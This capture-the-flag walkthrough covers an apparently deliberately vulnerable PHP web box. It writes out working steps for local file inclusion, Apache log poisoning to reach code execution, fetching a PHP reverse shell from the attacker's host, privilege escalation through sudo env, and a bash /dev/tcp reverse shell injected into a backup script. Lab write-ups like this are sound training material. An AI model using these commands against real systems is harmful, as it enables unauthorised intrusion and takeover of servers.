http://Machine_IP/?view=cat
So tried some of the php filter methods. And succeeded with this one,
http://Machine_IP/?view=php://filter/convert.base64-encode/resource=dog
source: Link
By entering this URL . We get a base64 encoded hash.
So its working.
Then we try /../index to get the source code index.
http://Machine_IP/?view=php://filter/convert.base64-encode/resource=dog/../index
Then we got a long hash it must be the source code index.
So decode it.
$echo "Base64_HASH" |base64 -d
In the source code we got very much vital code. which is,
<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
echo 'Here you go!';
include $_GET['view'] . $ext;
} else {
echo 'Sorry, only dogs or cats are allowed.';
}
}
?>
Here the code checks the extension , and we can give this manually in our URL.
http://Machine_IP/?view=dog/../../../../../../etc/passwd&ext=
and we got the /etc/passwd file.
So now we have access to the files . but we need a remote code execution. for that we have to access the log file.
http://Machine_IP/?view=dog/../../../../../../var/log/apache2/access.log&ext=
By this we can view the log file.
To get a command execution we execute the following command.
curl "http://Machine_IP/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
By executing the command we got the following warning in the log file.
It says that cannot execute blank command. Because we didn't give a value to 'c'.
Lets give a value to c. c=id
http://Machine_IP/?view=dog/../../../../../../var/log/apache2/access.log&ext&c=id
In the log we got the result.
Now we can upload a reverse shell in to the machine. download php reverse shell from pentestmonkey. Edit the IP and port.
then run simple http server using python in your system.
python -m SimpleHTTPServer 80
And run the following command on the browser to download our php shell.
curl http://My_IP:80/shell.php -o shell.php
By executing this commands we successfully uploaded the shell.php in the target machine. We can check this running 'ls' .
Now setup a netcat listener in our system.
nc -lnvp 1234 (1234 is the port I given in the reverse shell)
In the browser simply open the shell.php.
http://Machine_IP/shell.php
Now we got a reverse shell.
$ /usr/bin/script -qc /bin/bash /dev/null
By running this command we get a more persistent interactive shell.
Now we want to find the 4 flags.
first flag is inside the /var/www/html
second flag is inside the /var/www
Privilege Escalation :
Now we try to escalate privilege . because we dont have permission to the root directory. For that we try the command,
sudo -l
Here we can run /usr/bin/env with root privilege without password.
Searching in GTFOBins . we got the following command
sudo env /bin/sh
Now I'am root.
In the root directory we got the 3rd flag.
Now the 4th flag is little tricky . because it is not inside this box. It is some sort of another file system contains the 4th flag. In /opt directory there is a backups dorectory and it contains two files backup.sh and backup.tar these file has connection to the other box So using this we get reverse connection to that machine.
echo "#! /bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/My_IP/4444 0>&1'" >> backup.sh
nc -lnvp 4444 (In our machine)
wait a minute to get the reverse connection.
